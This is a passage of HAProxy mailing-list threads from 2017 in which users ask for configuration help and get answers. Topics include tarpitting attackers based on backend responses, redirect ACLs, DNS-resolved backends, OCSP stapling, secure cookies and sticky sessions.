die (drop, no response at all) or tarpit (long timeout, so they give up). I
suppose/hope they'll eventually remove my IP from their databases.

I'm guessing a tarpit is smarter than a reject, since the reject will
indicate to the attacker that somethings exist behind the server IP.
An iptable "drop" would be preferable, but I guess that's a little late
since haproxy has already acknowledged the connection to the attacker.

-- 
Regards
Charlie Elgholm
Brightly AB

Good example of delay with lua:
http://godevops.net/2015/06/24/adding-random-delay-specific-http-requests-haproxy-lua/


Re: tcp-response content tarpit if hdr(X-Tarpit-This)

2017-07-28 Thread Igor Cicimov
On Fri, Jul 28, 2017 at 6:03 PM, Charlie Elgholm 
wrote:

> Thanks!
>
> I was really hoping for acl-validation on the basis of the response from
> the backend server, and not on the incoming request at the frontend.
> And, as much as I really like lua as a language, I'd rather keep my
> haproxy with as small footprint as possible. =)
>
> Really nice example about all the possibilities though, thanks!
>
> This is how all examples I find operate:
> incoming request => haproxy => frontend => acl based on what's known about
> the incoming requests => A or B
> A: backend => stream backend response to client
> B: tarpit / reject
>
> I would like this:
> incoming request => haproxy => frontend => backend => acl based on what's
> known about the response from the backend => A or B
> A: stream backend response to client
> B: tarpit / reject
>
>
> 2017-07-28 9:52 GMT+02:00 Igor Cicimov :
>
>>
>>
>> On 28 Jul 2017 5:41 pm, "Charlie Elgholm"  wrote:
>>
>> Hi Folks,
>>
>> Either I'm too stupid, or it's because it's Friday
>>
>> Can you tarpit/reject (or other action) based on a response from the
>> backend?
>> You should be able to, right?
>>
>> Like this:
>> tcp-response content tarpit/reject if res.hdr(X-Tarpit-This)
>>
>> Can someone explain this to me? (Free beer.)
>>
>> I have a fairly complex ruleset on my backend server, written in Oracle
>> PL/SQL, which monitors Hack- or DoS-attempts, and I would love to tarpit
>> some requests on the frontend (by haproxy) based on something that happens
>> on my backend.
>>
>> As I do now I return a 503 response from the server, and iptable-block
>> those addresses for a while. But since they see the 503 response they'll
>> return at a later date and try again. I would like the connection to just
>> die (drop, no response at all) or tarpit (long timeout, so they give up). I
>> suppose/hope they'll eventually remove my IP from their databases.
>>
>> I'm guessing a tarpit is smarter than a reject, since the reject will
>> indicate to the attacker that somethings exist behind the server IP.
>> An iptable "drop" would be preferable, but I guess that's a little late
>> since haproxy has already acknowledged the connection to the attacker.
>>
>> --
>> Regards
>> Charlie Elgholm
>> Brightly AB
>>
>> Good example of delay with lua: http://godevops.net/2015/
>> 06/24/adding-random-delay-specific-http-requests-haproxy-lua/
>>
>
>
>
> --
> Regards
> Charlie Elgholm
> Brightly AB
>

Well the idea is to redirect the response on the backend (based on some
condition) to a local frontend​ where you can use the tarpit on the request.

You cam also try:

http-response silent-drop if { status 503 }

that you can use in the backed (at least in 1.7.8, not sure for other
versions)


Re: tcp-response content tarpit if hdr(X-Tarpit-This)

2017-07-29 Thread Igor Cicimov
On Fri, Jul 28, 2017 at 10:00 PM, Charlie Elgholm 
wrote:

> Ok, I'm on the 1.5.x bransch unfortunately, due to Oracle Linux issues.
> Can install manually, but that might raise some eyebrows.
>
> But what you're telling me is that I can route the request to another
> backend (or drop it) in haproxy based on something I received from one
> backend??
>
> Den 28 juli 2017 1:40 em skrev "Igor Cicimov"  com>:
>
>
>
> On Fri, Jul 28, 2017 at 6:03 PM, Charlie Elgholm 
> wrote:
>
>> Thanks!
>>
>> I was really hoping for acl-validation on the basis of the response from
>> the backend server, and not on the incoming request at the frontend.
>> And, as much as I really like lua as a language, I'd rather keep my
>> haproxy with as small footprint as possible. =)
>>
>> Really nice example about all the possibilities though, thanks!
>>
>> This is how all examples I find operate:
>> incoming request => haproxy => frontend => acl based on what's known
>> about the incoming requests => A or B
>> A: backend => stream backend response to client
>> B: tarpit / reject
>>
>> I would like this:
>> incoming request => haproxy => frontend => backend => acl based on what's
>> known about the response from the backend => A or B
>> A: stream backend response to client
>> B: tarpit / reject
>>
>>
>> 2017-07-28 9:52 GMT+02:00 Igor Cicimov :
>>
>>>
>>>
>>> On 28 Jul 2017 5:41 pm, "Charlie Elgholm"  wrote:
>>>
>>> Hi Folks,
>>>
>>> Either I'm too stupid, or it's because it's Friday
>>>
>>> Can you tarpit/reject (or other action) based on a response from the
>>> backend?
>>> You should be able to, right?
>>>
>>> Like this:
>>> tcp-response content tarpit/reject if res.hdr(X-Tarpit-This)
>>>
>>> Can someone explain this to me? (Free beer.)
>>>
>>> I have a fairly complex ruleset on my backend server, written in Oracle
>>> PL/SQL, which monitors Hack- or DoS-attempts, and I would love to tarpit
>>> some requests on the frontend (by haproxy) based on something that happens
>>> on my backend.
>>>
>>> As I do now I return a 503 response from the server, and iptable-block
>>> those addresses for a while. But since they see the 503 response they'll
>>> return at a later date and try again. I would like the connection to just
>>> die (drop, no response at all) or tarpit (long timeout, so they give up). I
>>> suppose/hope they'll eventually remove my IP from their databases.
>>>
>>> I'm guessing a tarpit is smarter than a reject, since the reject will
>>> indicate to the attacker that somethings exist behind the server IP.
>>> An iptable "drop" would be preferable, but I guess that's a little late
>>> since haproxy has already acknowledged the connection to the attacker.
>>>
>>> --
>>> Regards
>>> Charlie Elgholm
>>> Brightly AB
>>>
>>> Good example of delay with lua: http://godevops.net/2015/
>>> 06/24/adding-random-delay-specific-http-requests-haproxy-lua/
>>>
>>
>>
>>
>> --
>> Regards
>> Charlie Elgholm
>> Brightly AB
>>
>
> Well the idea is to redirect the response on the backend (based on some
> condition) to a local frontend​ where you can use the tarpit on the request.
>
> You cam also try:
>
> http-response silent-drop if { status 503 }
>
> that you can use in the backed (at least in 1.7.8, not sure for other
> versions)
>
>
>
>
​I was thinking of something along these lines:​

​frontend ft_tarpit
  mode http
  bind 127.0.0.1:
  default_backend bk_tarpit

backend bk_tarpit
  mode http
  timeout tarpit 3600s
  http-request tarpit

backend bk_main
  mode http
  http-response redirect 127.0.0.1: if { status 503 }​

but you are out of luck again since "http-response redirect" was introduced
in 1.6


Re: redirect scheme except some urls/params

2017-09-09 Thread Igor Cicimov
On 10 Sep 2017 12:05 am, "Markus Rietzler"  wrote:

hi,

i want activate redirection from http to https for my sites. but my problem
is, that there are certain requests, which
can't be redirected to https.

so i have to write some acls to check this.

the urls which can't be redirected all contains client=, they can look
like:

- /path/what=all;client=bar
- /path/what=all;client=foo
- /path/what=all;client=bar;mode=something
- /path/?client=bar;what=today

those paths will be internal rewritten in apache.

so i need to check, that client= is not present in the request.

there are two further cases: client=; and client=sitemap they can be
redirected to https. i tried a few ways but they
didn't work. i either get a 503 Server not available or all the client=xxx
requests are redirected to https.

i tried:

acl clientCheck urlp_reg /client=(?!(sitemap|;)).+/
redirect scheme https code 301 if !clientCheck

or

acl clientCheck path_reg /client=/
redirect scheme https code 301 if !clientCheck


Try escaping equal sign:

acl clientCheck path_reg /client\=/


any hints?

thanxs

markus


Re: Dynamic server name with HAProxy, based on original hostname

2017-09-15 Thread Igor Cicimov
On Fri, Sep 15, 2017 at 9:25 PM, Ludovic Gasc  wrote:

> Hi,
>
> I imagine that if I have no answer, it's because it isn't possible with
> HAProxy ?
>
> Thanks for your return.
>
>
> 2017-09-10 22:27 GMT+02:00 Ludovic Gasc :
>
>> Hi,
>>
>> I'm trying to reproduce this Nginx configuration with HAProxy:
>> https://memz.co/reverse-proxy-nginx-docker-microservices/
>>
>> Where it's possible to use DNS as dynamic list to proxy to the right
>> server.
>> Our use case isn't container-related, but simply to move easily a
>> customer from a backend server to another one, without to change the
>> HAproxy configuration.
>>
>> The closest feature in HAProxy seems to be option http_proxy, however, no
>> DNS lookup is performed:
>> http://cbonte.github.io/haproxy-dconv/configuration-1.7.
>> html#4.2-option%20http_proxy
>>
>> I have tried to use a resolver in haproxy configuration + in backend
>> section:
>>   server XX %[hdr(host)]: resolvers dns check
>> inter 1000 init-addr last,libc,127.0.0.1
>>
>> However, it doesn't work.
>>
>> Maybe with a lua script it's possible to implement that, but I would
>> prefer to have a simple configuration like with Nginx.
>>
>> Do I missed something ?
>>
>> BTW, thanks for HAProxy, I like a lot this product ;-)
>>
>> Regards.
>> --
>> Ludovic Gasc (GMLudo)
>>
>
>
​This should be a feature in 1.8, which version did you try?​


Re: Dynamic server name with HAProxy, based on original hostname

2017-09-17 Thread Igor Cicimov
In 1.8 haproxy takes all records returned by the dns resolver into account
where is in 1.7 only the first one in the list. That's the difference I was
referring to in my previous comment. Having this in mind your setup might
not work as you expect in case when your service has more than one endpoint.

Regarding your specific example, what exactly is not working? Haproxy will
perform dns resolution on startup and my guess would be it throws an error
since %[hdr(host)] at that point is empty.

On Sat, Sep 16, 2017 at 1:11 AM, Ludovic Gasc  wrote:

> I have tested with HAProxy 1.7.
>
> Where you see that it's a feature of 1.8 ?
> You mean I could try my piece of configuration on HAProxy 1.8, it should
> work ?
>
> Regards.
>
>
> 2017-09-15 14:47 GMT+02:00 Igor Cicimov :
>
>>
>>
>> On Fri, Sep 15, 2017 at 9:25 PM, Ludovic Gasc  wrote:
>>
>>> Hi,
>>>
>>> I imagine that if I have no answer, it's because it isn't possible with
>>> HAProxy ?
>>>
>>> Thanks for your return.
>>>
>>>
>>> 2017-09-10 22:27 GMT+02:00 Ludovic Gasc :
>>>
>>>> Hi,
>>>>
>>>> I'm trying to reproduce this Nginx configuration with HAProxy:
>>>> https://memz.co/reverse-proxy-nginx-docker-microservices/
>>>>
>>>> Where it's possible to use DNS as dynamic list to proxy to the right
>>>> server.
>>>> Our use case isn't container-related, but simply to move easily a
>>>> customer from a backend server to another one, without to change the
>>>> HAproxy configuration.
>>>>
>>>> The closest feature in HAProxy seems to be option http_proxy, however,
>>>> no DNS lookup is performed:
>>>> http://cbonte.github.io/haproxy-dconv/configuration-1.7.html
>>>> #4.2-option%20http_proxy
>>>>
>>>> I have tried to use a resolver in haproxy configuration + in backend
>>>> section:
>>>>   server XX %[hdr(host)]: resolvers dns
>>>> check inter 1000 init-addr last,libc,127.0.0.1
>>>>
>>>> However, it doesn't work.
>>>>
>>>> Maybe with a lua script it's possible to implement that, but I would
>>>> prefer to have a simple configuration like with Nginx.
>>>>
>>>> Do I missed something ?
>>>>
>>>> BTW, thanks for HAProxy, I like a lot this product ;-)
>>>>
>>>> Regards.
>>>> --
>>>> Ludovic Gasc (GMLudo)
>>>>
>>>
>>>
>> ​This should be a feature in 1.8, which version did you try?​
>>
>>
>


Re: Dynamic server name with HAProxy, based on original hostname

2017-09-17 Thread Igor Cicimov
On Mon, Sep 18, 2017 at 7:11 AM, Ludovic Gasc  wrote:

> 2017-09-17 11:16 GMT+02:00 Igor Cicimov :
>
>> In 1.8 haproxy takes all records returned by the dns resolver into
>> account where is in 1.7 only the first one in the list. That's the
>> difference I was referring to in my previous comment. Having this in mind
>> your setup might not work as you expect in case when your service has more
>> than one endpoint.
>>
>
> Indeed, it doesn't help me.
>
>
>> Regarding your specific example, what exactly is not working? Haproxy
>> will perform dns resolution on startup and my guess would be it throws an
>> error since %[hdr(host)] at that point is empty.
>>
>
> Exactly.
> No idea to avoid that.
>

​Try something like this, creating separate backend per service:​

​frontend fe_web
  ...
  ​use_backend
%[req.hdr(host),lower,map_dom(/etc/haproxy/domains.map,bk_unknown_domain)]

backend bk_svc_1
  server svc1 service1.service.local: resolvers dns check inter 1000
init-addr last,libc,127.0.0.1

backend bk_svc_2
  server svc2 service2.service.local: resolvers dns check inter 1000
init-addr last,libc,127.0.0.1
.
.
.
backend bk_svc_n
  server svcn servicen.service.local: resolvers dns check inter 1000
init-addr last,libc,127.0.0.1

backend bk_unknown_domain
 


and have in your /etc/haproxy/domains.map map file:

service1.domain.com bk_svc_1
service2.domain.com bk_svc_2
...
servicen.domain.com bk_svc_n


It is not that dynamic though as in the Nginx example you linked to since
you have to maintain the map file and insert new backend per service but
nothing that cant be solved with some CM tool if needed. Maybe even avoid
the map file if you prefer it that way and have the backend named as the
Host header:

frontend
  use_backend %[req.hdr(host)]
  default_backend bk_unknown_domain

backend service1.domain.com
backend service2.domain.com
...
backend bk_unknown_domain


Igor


OCSP stapling with multiple certificates

2017-09-19 Thread Igor Cicimov
Hi,

I've been running haproxy with OCSP stapling for some time with a single
ssl certificate. Now I'm trying to enable the same for multiple
certificates but am getting an error:

OCSP single response: Certificate ID does not match any certificate or
issuer.

The OCSP response itself from the provider is good:

/etc/haproxy/ssl.d/${CERT}: good
This Update: Sep 19 23:48:22 2017 GMT
Next Update: Sep 26 23:03:22 2017 GMT

for all certificates but when I try feeding the OCSP response file to the
haproxy socket:

# echo "set ssl ocsp-response $(/usr/bin/base64 -w 1 ${CERT}.ocsp)" |
socat stdio unix-connect:/run/haproxy/admin.sock

I get the above error.

As mentioned at the beginning this is working fine with single cert. Am I
missing something or this is simply not possible?

​Thanks,
Igor​


Re: OCSP stapling with multiple certificates

2017-09-19 Thread Igor Cicimov
On Wed, Sep 20, 2017 at 4:00 PM, Jarno Huuskonen 
wrote:

> Hi,
>
> On Wed, Sep 20, Igor Cicimov wrote:
> > I've been running haproxy with OCSP stapling for some time with a single
> > ssl certificate. Now I'm trying to enable the same for multiple
> > certificates but am getting an error:
> >
> > OCSP single response: Certificate ID does not match any certificate or
> > issuer.
> >
> > The OCSP response itself from the provider is good:
> >
> > /etc/haproxy/ssl.d/${CERT}: good
> > This Update: Sep 19 23:48:22 2017 GMT
> > Next Update: Sep 26 23:03:22 2017 GMT
> >
> > for all certificates but when I try feeding the OCSP response file to the
> > haproxy socket:
> >
> > # echo "set ssl ocsp-response $(/usr/bin/base64 -w 1 ${CERT}.ocsp)" |
> > socat stdio unix-connect:/run/haproxy/admin.sock
> >
> > I get the above error.
> >
> > As mentioned at the beginning this is working fine with single cert. Am I
> > missing something or this is simply not possible?
>
> I've multiple certs w/ocsp stapling so it should work.
>
> Did you start haproxy with .ocsp files for all certs ?
>
> I think I might have seen the same error if I started haproxy w/out
> cert1.ocsp and then tried to update ocsp for cert1.
>
> -Jarno
>
> --
> Jarno Huuskonen
>

​Yep, thanks Jarno, I went and found my notes on ocsp and realised that's
what I was missing.


Re: Set-Cookie Secure

2017-09-21 Thread Igor Cicimov
On 18 Sep 2017 10:37 pm, "rob.mlist"  wrote:

I set 2 cookies on behalf of Backend Servers: one with these configuration
lines at Frontend:



   rspadd Set-Cookie:\ x_cookie_servedby=web1_;\ path=/  if id_web1
!back_cookie_present

   rspadd Set-Cookie:\ x_cookie_servedby=web4_;\ path=/  if id_web4
!back_cookie_present

   rspadd Set-Cookie:\ x_cookie_servedby=web10_;\ path=/  if id_web10
!back_cookie_present



one at Backend with these line (and Backend cookie directive on each
server):

   cookie cookie_ha_srvid insert indirect preserve nocache



now I need to change every response to clients to add "secure" attribute
for all client encrypted connections.

I applied following rules, but *no secure attribute is added to the
response*:



   acl https_sess ssl_fc

   acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure

   rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie





Roberto

Well if you are handling the requests in two different, lets call them
pipelines, like fe_http:80->be_http and fe_https:443-> be_https you can
obviously set secure cookies for the second one only without any acl
gymnastics.


Re: Set-Cookie Secure

2017-09-21 Thread Igor Cicimov
Then you can unconditionally include Secure in your "rspadd Set-Cookie ..."
since the communication between the client and HAP is always over SSL. Or
am I missing something?

On Fri, Sep 22, 2017 at 10:18 AM, mlist  wrote:

> Hi Igor, I use fe_https:443-> be_http
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
> *Sent:* venerdì 22 settembre 2017 00:44
> *To:* rob.mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
>
>
>
>
> On 18 Sep 2017 10:37 pm, "rob.mlist"  wrote:
>
> I set 2 cookies on behalf of Backend Servers: one with these configuration
> lines at Frontend:
>
>
>
>rspadd Set-Cookie:\ x_cookie_servedby=web1_;\ path=/  if id_web1
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web4_;\ path=/  if id_web4
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web10_;\ path=/  if id_web10
> !back_cookie_present
>
>
>
> one at Backend with these line (and Backend cookie directive on each
> server):
>
>cookie cookie_ha_srvid insert indirect preserve nocache
>
>
>
> now I need to change every response to clients to add "secure" attribute
> for all client encrypted connections.
>
> I applied following rules, but *no secure attribute is added to the
> response*:
>
>
>
>acl https_sess ssl_fc
>
>acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
>
>rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie
>
>
>
>
>
> Roberto
>
> Well if you are handling the requests in two different, lets call them
> pipelines, like fe_http:80->be_http and fe_https:443-> be_https you can
> obviously set secure cookies for the second one only without any acl
> gymnastics.
>
>
>


Re: TCP ACL rules based on host name

2017-10-04 Thread Igor Cicimov
On 22 Sep 2017 11:15 am, "rt3p95qs"  wrote:

Is it possible to assign TCP (no HTTP) connections to a backend based on an
alias haproxy has?

For example:
HAProxy has 3 alias names, server01.example.com, server02.example.com and
server03.example.com.

The haproxy.conf file defines a front end and 3 back ends:

frontend static-svc
   bind *:80
   mode tcp
   option tcplog
   default_backend svc-svc-default


backend stactic-svc01
balance source
option tcplog
server server01 127.0.0.1 check

backend static-svc02
balance source
option tcplog
server server02 127.0.0.2 check

backend static-svc03
balance source
option tcplog
server server03 127.0.0.3 check

The idea being that each static-service should only service in coming
requests thru a specific alias; therefore, requests coming from the
internet looking for server01.example.com would be sent to the static-svc01
back end. I have seen tons of examples on how to do this with HTTP, but I
can't find any that focus on pure TCP. My application does not use HTTP at
all.

Thanks.


Hmmm in case of ssl you could do something like this using the sni
extension:

tcp-request inspect-delay 5s
tcp-request content accept if { req_ssl_hello_type 1 }
use_backend  sratic-svc01 if { req.ssl_sni -i server01.example.com }

otherwise not sure how can you access the host header in the tcp stream.


Re: Set-Cookie Secure

2017-10-05 Thread Igor Cicimov
Hi,

On Fri, Oct 6, 2017 at 2:50 AM, mlist  wrote:

> Hi Igor, some news about this ?
>
>
>
> *From:* mlist
> *Sent:* venerdì 22 settembre 2017 08:58
> *To:* 'Igor Cicimov' 
> *Cc:* 'HAProxy' 
> *Subject:* RE: Set-Cookie Secure
>
>
>
> I have acl to leave some sites http (not redirected to https), so adding
> secure flag on rspadd it is not an option.
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com
> ]
> *Sent:* venerdì 22 settembre 2017 02:35
> *To:* mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
> Then you can unconditionally include Secure in your "rspadd Set-Cookie
> ..." since the communication between the client and HAP is always over SSL.
> Or am I missing something?
>
>
>
> On Fri, Sep 22, 2017 at 10:18 AM, mlist  wrote:
>
> Hi Igor, I use fe_https:443-> be_http
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
> *Sent:* venerdì 22 settembre 2017 00:44
> *To:* rob.mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
>
>
>
>
> On 18 Sep 2017 10:37 pm, "rob.mlist"  wrote:
>
> I set 2 cookies on behalf of Backend Servers: one with these configuration
> lines at Frontend:
>
>
>
>rspadd Set-Cookie:\ x_cookie_servedby=web1_;\ path=/  if id_web1
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web4_;\ path=/  if id_web4
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web10_;\ path=/  if id_web10
> !back_cookie_present
>
>
>
> one at Backend with these line (and Backend cookie directive on each
> server):
>
>cookie cookie_ha_srvid insert indirect preserve nocache
>
>
>
> now I need to change every response to clients to add "secure" attribute
> for all client encrypted connections.
>
> I applied following rules, but *no secure attribute is added to the
> response*:
>
>
>
>
> ​​
> acl https_sess ssl_fc
>
>acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
>
>rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie
>
>
>
>
>
> Roberto
>
> Well if you are handling the requests in two different, lets call them
> pipelines, like fe_http:80->be_http and fe_https:443-> be_https you can
> obviously set secure cookies for the second one only without any acl
> gymnastics.
>
>
>
> ​Well no, not really. Above ^^^ I asked​ if you are (or can convert
to) running two frontends, one for http and one for https, and you replied
that you are not and that you are using single *fe_https:443-> be_http*.
Are you saying you have both http and https over same 443 port?
​

​


If not and you are really running single frontend listening on both 80 and
443 for http/https, i.e. *fe_https:(80,443) -> be_http *setup, I would say
that your problem is here:

​
*acl https_sess ssl_fc *

 acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure

 rspirep ^(set-cookie:.*) \1;\ Secure if *https_sess* !secured_cookie


more specific using an acl in the response that is set based on the request
will not work. Try using *capture* or *set-var* instead so the value set in
request time is preserved for the logic applied in the response time.

Also sending the full config with sensitive data removed can be helpful.


Re: Set-Cookie Secure

2017-10-08 Thread Igor Cicimov
Maybe try something like:

   http-request set-var(txn.req_ssl) ssl_fc

   acl https_sess var(txn.req_ssl)
   acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
   rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie

So the first line sets transactional variable valid for the request AND
response and then use it in the https_sess acl for the response.

On Sat, Oct 7, 2017 at 9:30 PM, mlist  wrote:

> I prefer to use only one frontend for all request, so I can control
> centrally many config
>
> avoiding replication of rules not so simple to maintain but centralizing
> means to manage
>
> not default cases, so: by default all http are converted to https if some
> conditions (acl)
>
> are not meet (for applications we impose https, for web sites we leave
> choice, …).
>
>
>
> We also use stick table as base for ddos control, ect, as now only basic
> rules and
>
> use cookies mechanism for normal persistence and for special client side
> app persistence
>
> needed to identify backend server in special situations.
>
>
>
> In attach config file
>
>
>
>
>
>
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
> *Sent:* venerdì 6 ottobre 2017 02:11
>
> *To:* mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
> Hi,
>
>
>
> On Fri, Oct 6, 2017 at 2:50 AM, mlist  wrote:
>
> Hi Igor, some news about this ?
>
>
>
> *From:* mlist
> *Sent:* venerdì 22 settembre 2017 08:58
> *To:* 'Igor Cicimov' 
> *Cc:* 'HAProxy' 
> *Subject:* RE: Set-Cookie Secure
>
>
>
> I have acl to leave some sites http (not redirected to https), so adding
> secure flag on rspadd it is not an option.
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com
> ]
> *Sent:* venerdì 22 settembre 2017 02:35
> *To:* mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
> Then you can unconditionally include Secure in your "rspadd Set-Cookie
> ..." since the communication between the client and HAP is always over SSL.
> Or am I missing something?
>
>
>
> On Fri, Sep 22, 2017 at 10:18 AM, mlist  wrote:
>
> Hi Igor, I use fe_https:443-> be_http
>
>
>
> *From:* Igor Cicimov [mailto:ig...@encompasscorporation.com]
> *Sent:* venerdì 22 settembre 2017 00:44
> *To:* rob.mlist 
> *Cc:* HAProxy 
> *Subject:* Re: Set-Cookie Secure
>
>
>
>
>
>
>
> On 18 Sep 2017 10:37 pm, "rob.mlist"  wrote:
>
> I set 2 cookies on behalf of Backend Servers: one with these configuration
> lines at Frontend:
>
>
>
>rspadd Set-Cookie:\ x_cookie_servedby=web1_;\ path=/  if id_web1
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web4_;\ path=/  if id_web4
> !back_cookie_present
>
>rspadd Set-Cookie:\ x_cookie_servedby=web10_;\ path=/  if id_web10
> !back_cookie_present
>
>
>
> one at Backend with these line (and Backend cookie directive on each
> server):
>
>cookie cookie_ha_srvid insert indirect preserve nocache
>
>
>
> now I need to change every response to clients to add "secure" attribute
> for all client encrypted connections.
>
> I applied following rules, but *no secure attribute is added to the
> response*:
>
>
>
>
>
> ​​
>
> acl https_sess ssl_fc
>
>acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
>
>rspirep ^(set-cookie:.*) \1;\ Secure if https_sess !secured_cookie
>
>
>
>
>
> Roberto
>
> Well if you are handling the requests in two different, lets call them
> pipelines, like fe_http:80->be_http and fe_https:443-> be_https you can
> obviously set secure cookies for the second one only without any acl
> gymnastics.
>
>
>
> ​Well no, not really. Above ^^^ I asked​ if you are (or can convert
> to) running two frontends, one for http and one for https, and you replied
> that you are not and that you are using single *fe_https:443-> be_http*.
> Are you saying you have both http and https over same 443 port?
>
> ​
>
>
>
> ​
>
>
>
>
>
> If not and you are really running single frontend listening on both 80 and
> 443 for http/https, i.e. *fe_https:(80,443) -> be_http *setup, I would
> say that your problem is here:
>
>
>
> ​
>
> *acl https_sess ssl_fc *
>
>  acl secured_cookie res.hdr(Set-Cookie),lower -m sub secure
>
>  rspirep ^(set-cookie:.*) \1;\ Secure if *https_sess* !secured_cookie
>
>
>
> more specific using an acl in the response that is set based on the
> request will not work. Try using *capture* or *set-var* instead so the
> value set in request time is preserved for the logic applied in the
> response time.
>
>
>
> Also sending the full config with sensitive data removed can be helpful.
>


Re: Haproxy config for sticky route

2017-10-10 Thread Igor Cicimov
On Tue, Oct 10, 2017 at 11:25 PM, Ruben  wrote:

> I have some stateful chat servers (SockJS) running in docker swarm mode.
> When doing dig chat I get an unordered randomized list of servers for
> example:
>
> (every time the order is different)
> 10.0.0.12
> 10.0.0.10
> 10.0.0.11
>
> The chat is accessed by a chatName url parameter. Now I want to be able to
> run a chat-load-balancer service in docker with multiple replicas using the
> haproxy image.
>
> The problem is that docker always resolves to a randomized list when doing
> dig chat.
>
> I want to map the chatName param from the url to a fixed server which
> always have the same ip from the list of ips of dig chat. So the mapping of
> the url_param should not be based on the position of the server in the
> list, but solely on the ip of the server.
>
> So for example ?chatName=fun should always route to ip 10.0.0.12, no
> matter what.
>
> My current haproxy.cfg is:
>
> defaults
>   mode http
>   timeout client 5s
>   timeout connect 5s
>   timeout server 5s
>
> frontend frontend_chat
>   bind :80
>   mode http
>   timeout client 120s
>   option forwardfor
>   option http-server-close
>   option http-pretend-keepalive
>   default_backend backend_chat
>
> backend backend_chat
>   balance url_param chatName
>   timeout server 120s
>   server chat chat:80
>
> At the moment it seems that only the Commercial Subscribtion of Nginx can
> handle this kind of cases using the sticky route $variable ...; directive
> in the upstream module.
>

​Maybe try:

http-request set-header Host 10.0.0.12 if { query -m beg -i chatName=fun }​


Re: Force Sticky session on HaProxy

2017-10-18 Thread Igor Cicimov
https://cbonte.github.io/haproxy-dconv/1.7/configuration.html#option
redispatch

On 18 Oct 2017 11:28 pm, "Devendra Joshi" 
wrote:

Hi Daniel ,

Following is the case.


[image: Inline images 1]

My Query is :
1: When users are serving the webpages,and  my *Apache1 *get down, HaProxy
shifted the traffic to *Apache2*.
But i don't want to shift this traffic to *Apache2 *when my *Apache1 *is
down, cause my application is session base.  I want, those are serving
from *Apache1
*, they should keep on *Apache1*. not to shift on *Apache2*.
I want to apply Force sticky session in Haproxy.









Devendra Joshi
8080106035
--
--


On 18 October 2017 at 17:37, Daniel Schneller  wrote:

> Hi,
>
> maybe I am missing something, but isn’t this what
> http://cbonte.github.io/haproxy-dconv/1.6/configuration.html#4.2-cookie is
> supposed to do for you?
> We are using this (in prefix mode) to make sure the same JSESSIONID gets
> to the same backend every time.
> As the information is in the cookie, there is no state to be lost on the
> haproxy side.
>
> Daniel
>
> --
> Daniel Schneller
> Principal Cloud Engineer
>
> CenterDevice GmbH  | Hochstraße 11
> 
>| 42697 Solingen
> tel: +49 1754155711 <+49%20175%204155711>| Deutschland
> daniel.schnel...@centerdevice.de   | www.centerdevice.de
>
> Geschäftsführung: Dr. Patrick Peschlow, Dr. Lukas Pustina,
> Michael Rosbach, Handelsregister-Nr.: HRB 18655,
> HR-Gericht: Bonn, USt-IdNr.: DE-815299431
>
>
> On 18. Oct. 2017, at 11:58, Gibson, Brian (IMS) 
> wrote:
>
> I've used peers for this situation personally.
>
> Sent from Nine
> 
> From: Aaron West 
> Sent: Oct 18, 2017 5:33 AM
> To: Devendra Joshi
> Cc: HAProxy
> Subject: Re: Force Sticky session on HaProxy
>
> I've used something like this before:
>
> stick store-response res.cook(JSESSIONID)
> stick match req.cook(JSESSIONID)
>
> "stick on" does this I think:
>
> stick match req.cook(JSESSIONID)
> stick store-request req.cook(JSESSIONID)
>
> As the client doesn't have the cookie at the beginning of the
> connection it has to wait to store it until it's received from the
> server, I have a vague memory that I had issues with using simply
> "stick on" for this so switched to the first method above.
>
> There is a massive problem with my suggestion however, if you clear
> the stick table or restart the service(Which will clear the stick
> table) then users lose persistence until they close their browsers and
> start a new session or the server issues a new cookie. Obviously
> reloads while synchronising the stick table should be fine.
>
> However, i'm sure there will be a far better solution so I'm just
> starting the ball rolling really...
>
> Aaron West
>
> Loadbalancer.org Ltd.
>
> www.loadbalancer.org
>
> +1 888 867 9504 <+1%20888-867-9504> / +44 (0)330 380 1064
> <+44%20330%20380%201064>
> aa...@loadbalancer.org
>
> LEAVE A REVIEW | DEPLOYMENT GUIDES | BLOG
>
>
> 
>
> Information in this e-mail may be confidential. It is intended only for
> the addressee(s) identified above. If you are not the addressee(s), or an
> employee or agent of the addressee(s), please note that any dissemination,
> distribution, or copying of this communication is strictly prohibited. If
> you have received this e-mail in error, please notify the sender of the
> error.
>
>
>


Re: [PATCH] LDAP authentication

2017-11-02 Thread Igor Cicimov
Hi ​Thierry,

On Fri, Nov 3, 2017 at 8:16 AM,
​​
Thierry Fournier  wrote:

>
> > On 2 Nov 2017, at 21:56, my.card@web.de wrote:
> >
> > Hi all,
> >
> > the attached patch implements authentication against an LDAP Directory
> Server. It has been tested on Ubuntu 16.04 (x86_64) using libldap-2.4-2 on
> the client side and 389-ds-base 1.3.4.9-1 on the server side. Add
> USE_LDAP=1 to your make command line to compile it in.
> >
> > What do I have to to, to get this functionality integrated within the
> next offcial haproxy release?
> >
> > I'm currently trying to figure out, how to pass commas ',' and bracket
